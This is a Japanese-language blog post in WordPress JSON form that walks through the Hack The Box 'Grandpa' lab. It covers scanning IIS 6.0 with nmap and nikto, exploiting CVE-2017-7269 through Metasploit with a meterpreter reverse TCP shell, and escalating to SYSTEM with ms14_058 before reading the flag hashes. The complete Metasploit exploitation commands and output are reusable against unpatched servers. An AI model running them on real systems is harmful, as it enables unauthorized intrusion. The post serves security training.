{"id":3761,"date":"2020-08-23T14:11:30","date_gmt":"2020-08-23T05:11:30","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3761"},"modified":"2020-08-30T23:31:08","modified_gmt":"2020-08-30T14:31:08","slug":"hack-the-box-grandpa-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3761","title":{"rendered":"Hack The Box – Grandpa – Walkthrough"},"content":{"rendered":"

80\u756a\u30dd\u30fc\u30c8\u3067IIS 6.0\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b<\/h3>\n
\r\n# nmap -A -n -F -T5 grandpa.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 02:48 UTC\r\nNmap scan report for grandpa.htb (10.10.10.14)\r\nHost is up (0.038s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Microsoft IIS httpd 6.0\r\n| http-methods:\r\n|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH\r\n|_http-server-header: Microsoft-IIS\/6.0\r\n|_http-title: Under Construction\r\n| http-webdav-scan:\r\n|   Server Type: Microsoft-IIS\/6.0\r\n|   WebDAV type: Unknown\r\n|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n|_  Server Date: Sun, 23 Aug 2020 02:54:24 GMT\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n\r\n# nmap -T4 --script vuln grandpa.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 02:49 UTC\r\nNmap scan report for grandpa.htb (10.10.10.14)\r\nHost is up (0.028s latency).\r\nNot shown: 999 filtered ports\r\nPORT   STATE SERVICE\r\n80\/tcp open  http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\r\n|_http-dombased-xss: Couldn't find any DOM based XSS.\r\n| http-enum:\r\n|   \/postinfo.html: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.exe: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.exe: Frontpage file or folder\r\n|   \/_vti_bin\/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder\r\n|   \/_vti_bin\/shtml.dll: Frontpage file or folder\r\n|_  \/_vti_bin\/shtml.exe: Frontpage file or folder\r\n| http-frontpage-login:\r\n|   VULNERABLE:\r\n|   Frontpage extension anonymous login\r\n|     State: VULNERABLE\r\n|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.\r\n|\r\n|     References:\r\n|_      http:\/\/insecure.org\/sploits\/Microsoft.frontpage.insecurities.html\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 539.57 seconds\r\n\r\n# perl nikto.pl -h http:\/\/grandpa.htb\/\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          10.10.10.14\r\n+ Target Hostname:    grandpa.htb\r\n+ Target Port:        80\r\n+ Start Time:         2020-08-23 02:50:18 (GMT0)\r\n---------------------------------------------------------------------------\r\n+ Server: Microsoft-IIS\/6.0\r\n+ Retrieved microsoftofficewebserver header: 5.0_Pub\r\n+ Retrieved x-powered-by header: ASP.NET\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\r\n+ Retrieved x-aspnet-version header: 1.1.4322\r\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n+ Retrieved dasl header: <DAV:sql>\r\n+ Retrieved dav header: 1, 2\r\n+ Retrieved ms-author-via header: MS-FP\/4.0,DAV\r\n+ Uncommon header 'ms-author-via' found, with contents: MS-FP\/4.0,DAV\r\n+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.\r\n+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.\r\n+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ WebDAV enabled (PROPFIND SEARCH UNLOCK COPY MKCOL LOCK PROPPATCH listed as allowed)\r\n+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http:\/\/10.10.10.14\/\r\n+ OSVDB-396: \/_vti_bin\/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe\/aux.htm -- a DoS was not attempted.\r\n+ OSVDB-3233: \/postinfo.html: Microsoft FrontPage default file found.\r\n+ OSVDB-3233: \/_vti_inf.html: FrontPage\/SharePoint is installed and reveals its version number (check HTML source for more information).\r\n+ OSVDB-3500: \/_vti_bin\/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-1999-1376. http:\/\/www.securityfocus.com\/bid\/2252.\r\n+ OSVDB-67: \/_vti_bin\/shtml.dll\/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.\r\n+ \/_vti_bin\/_vti_adm\/admin.dll: FrontPage\/SharePoint file found.\r\n+ 8108 requests: 3 error(s) and 27 item(s) reported on remote host\r\n+ End Time:           2020-08-23 03:16:32 (GMT0) (1574 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested\r\n<\/pre>\n
\"\"<\/a><\/p>\n
CVE-2017-7269\u3092\u8d77\u70b9\u306b\u8abf\u67fb<\/h3>\n
[IIS 6.0 exploit]\u3067\u691c\u7d22\u3057\u305f\u3068\u3053\u308d\u3001CVE-2017-7269\u304c\u76ee\u7acb\u3063\u3066\u3044\u305f\u305f\u3081\u3001\u307e\u305a\u306f\u3053\u308c\u3092\u8a66\u3057\u3066\u307f\u308b\u3053\u3068\u306b\u3002<\/p>\n
\r\n# msfconsole\r\n\r\nmsf5 > search CVE-2017-7269\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                                 Disclosure Date  Rank    Check  Description\r\n   -  ----                                                 ---------------  ----    -----  -----------\r\n   0  exploit\/windows\/iis\/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow\r\n\r\nmsf5 > use 0\r\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) > show options\r\n\r\nModule options (exploit\/windows\/iis\/iis_webdav_scstoragepathfromurl):\r\n\r\n   Name           Current Setting  Required  Description\r\n   ----           ---------------  --------  -----------\r\n   MAXPATHLENGTH  60               yes       End of physical path brute force\r\n   MINPATHLENGTH  3                yes       Start of physical path brute force\r\n   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]\r\n   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n   RPORT          80               yes       The target port (TCP)\r\n   SSL            false            no        Negotiate SSL\/TLS for outgoing connections\r\n   TARGETURI      \/                yes       Path of IIS 6 web application\r\n   VHOST                           no        HTTP server virtual host\r\n\r\n\r\nPayload options (windows\/meterpreter\/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT     4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Microsoft Windows Server 2003 R2 SP2 x86\r\n\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) > set RHOSTS grandpa.htb\r\nRHOSTS => grandpa.htb\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.21\r\nLHOST => 10.10.14.21\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) > check\r\n[+] 10.10.10.14:80 - The target is vulnerable.\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) > exploit\r\n\r\n[-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Trying path length 3 to 60 ...\r\n[*] Sending stage (176195 bytes) to 172.17.0.1\r\n[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:52034) at 2020-08-23 04:27:32 +0000\r\n\r\nmeterpreter > getuid\r\n[-] stdapi_sys_config_getuid: Operation failed: Access is denied.\r\n\r\nmeterpreter > ps\r\n\r\nProcess List\r\n============\r\n\r\n PID   PPID  Name               Arch  Session  User                          Path\r\n ---   ----  ----               ----  -------  ----                          ----\r\n 0     0     [System Process]\r\n 4     0     System\r\n 272   4     smss.exe\r\n 324   272   csrss.exe\r\n 348   272   winlogon.exe\r\n 396   348   services.exe\r\n 408   348   lsass.exe\r\n 616   396   svchost.exe\r\n 676   396   svchost.exe\r\n 740   396   svchost.exe\r\n 764   396   svchost.exe\r\n 800   396   svchost.exe\r\n 936   396   spoolsv.exe\r\n 964   396   msdtc.exe\r\n 1076  396   cisvc.exe\r\n 1116  396   svchost.exe\r\n 1176  396   inetinfo.exe\r\n 1216  396   svchost.exe\r\n 1328  396   VGAuthService.exe\r\n 1408  396   vmtoolsd.exe\r\n 1456  396   svchost.exe\r\n 1600  396   svchost.exe\r\n 1700  396   alg.exe\r\n 1800  616   wmiprvse.exe       x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe\r\n 1832  348   logon.scr\r\n 1912  396   dllhost.exe\r\n 2180  1456  w3wp.exe           x86   0        NT AUTHORITY\\NETWORK SERVICE  c:\\windows\\system32\\inetsrv\\w3wp.exe\r\n 2248  616   davcdata.exe       x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\inetsrv\\davcdata.exe\r\n 2304  2180  rundll32.exe       x86   0                                      C:\\WINDOWS\\system32\\rundll32.exe\r\n 2404  1076  cidaemon.exe\r\n 2416  1076  cidaemon.exe\r\n 2460  1076  cidaemon.exe\r\n 2484  616   wmiprvse.exe\r\n\r\nmeterpreter > migrate 1800\r\n[*] Migrating from 2304 to 1800...\r\n[*] Migration completed successfully.\r\n\r\nmeterpreter > getuid\r\nServer username: NT AUTHORITY\\NETWORK SERVICE\r\n\r\nmeterpreter > background\r\n[*] Backgrounding session 1...\r\n<\/pre>\n
local_exploit_suggester\u3092\u5229\u7528\u3057\u3066\u8106\u5f31\u6027\u3092\u63a2\u3059<\/h3>\n
\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) > use post\/multi\/recon\/local_exploit_suggester\r\n\r\nmsf5 post(multi\/recon\/local_exploit_suggester) > set SESSION 1\r\nSESSION => 1\r\n\r\nmsf5 post(multi\/recon\/local_exploit_suggester) > exploit\r\n\r\n[*] 10.10.10.14 - Collecting local exploits for x86\/windows...\r\n[*] 10.10.10.14 - 34 exploit checks are being tried...\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ms10_015_kitrap0d: The service is running, but could not be validated.\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ms14_070_tcpip_ioctl: The target appears to be vulnerable.\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ms16_016_webdav: The service is running, but could not be validated.\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\r\n[+] 10.10.10.14 - exploit\/windows\/local\/ppr_flatten_rec: The target appears to be vulnerable.\r\n[*] Post module execution completed\r\n<\/pre>\n
ms14_058_track_popup_menu \u3092\u5229\u7528\u3057\u3066\u6a29\u9650\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n
\r\nmsf5 post(multi\/recon\/local_exploit_suggester) > use exploit\/windows\/local\/ms14_058_track_popup_menu\r\n[*] Using configured payload windows\/meterpreter\/reverse_tcp\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > set SESSION 1\r\nSESSION => 1\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > set LHOST 10.10.14.21\r\nLHOST => 10.10.14.21\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > exploit\r\n\r\n[-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Launching notepad to host the exploit...\r\n[+] Process 3052 launched.\r\n[*] Reflectively injecting the exploit DLL into 3052...\r\n[*] Injecting exploit into 3052...\r\n[*] Exploit injected. Injecting payload into 3052...\r\n[*] Payload injected. Executing exploit...\r\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\r\n[*] Sending stage (176195 bytes) to 172.17.0.1\r\n[*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:43704) at 2020-08-23 04:44:33 +0000\r\n\r\nmeterpreter > getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\n\r\nmeterpreter > shell\r\nProcess 2352 created.\r\nChannel 2 created.\r\nMicrosoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\WINDOWS\\system32>type "C:\\Documents and Settings\\Harry\\Desktop\\user.txt"\r\ntype "C:\\Documents and Settings\\Harry\\Desktop\\user.txt"\r\nbdff5ec67c3cff017f2bedc146a5d869\r\n\r\nC:\\WINDOWS\\system32>type "C:\\Documents and Settings\\Administrator\\Desktop\\root.txt"\r\ntype "C:\\Documents and Settings\\Administrator\\Desktop\\root.txt"\r\n9359e905a2c35f861f6a57cecf28bb7b\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
80\u756a\u30dd\u30fc\u30c8\u3067IIS 6.0\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b # nmap -A -n -F -T5 grandpa.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 02 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3761"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3761"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3761\/revisions"}],"predecessor-version":[{"id":3779,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3761\/revisions\/3779"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}